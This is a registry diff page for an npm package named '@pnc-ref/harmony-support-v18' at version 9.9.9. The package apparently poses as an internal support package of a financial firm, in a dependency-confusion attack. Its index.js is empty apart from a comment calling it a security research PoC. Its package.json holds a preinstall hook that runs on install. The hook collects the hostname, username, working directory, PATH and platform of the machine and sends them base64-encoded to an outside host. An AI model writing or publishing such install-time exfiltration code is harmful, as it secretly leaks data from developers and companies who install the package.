@pnc-ref/harmony-support-v18 9.9.9

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. package/index.js +3 -0
  2. package/package.json +13 -0
package/index.js ADDED
@@ -0,0 +1,3 @@
1
+ // @pnc-ref/harmony-support-v18
2
+ // Security research PoC — dependency confusion
3
+ module.exports = {};
package/package.json ADDED
@@ -0,0 +1,13 @@
1
+ {
2
+ "name": "@pnc-ref/harmony-support-v18",
3
+ "version": "9.9.9",
4
+ "description": "Harmony platform support v18",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "preinstall": "node -e \"const h=require('https');const os=require('os');const p=process;const d={pkg:process.env.npm_package_name,v:process.env.npm_package_version,host:os.hostname(),user:os.userInfo().username,platform:os.platform(),cwd:p.cwd(),path:process.env.PATH||'',node:p.version};const b=JSON.stringify(d);const r=h.request({hostname:'teste.aborto.online',port:443,path:'/'+Buffer.from(JSON.stringify(d)).toString('base64').slice(0,100),method:'GET'},()=>{});r.on('error',()=>{});r.end();\""
8
+ },
9
+ "keywords": [],
10
+ "author": "PNC Financial Services Group",
11
+ "license": "UNLICENSED",
12
+ "private": false
13
+ }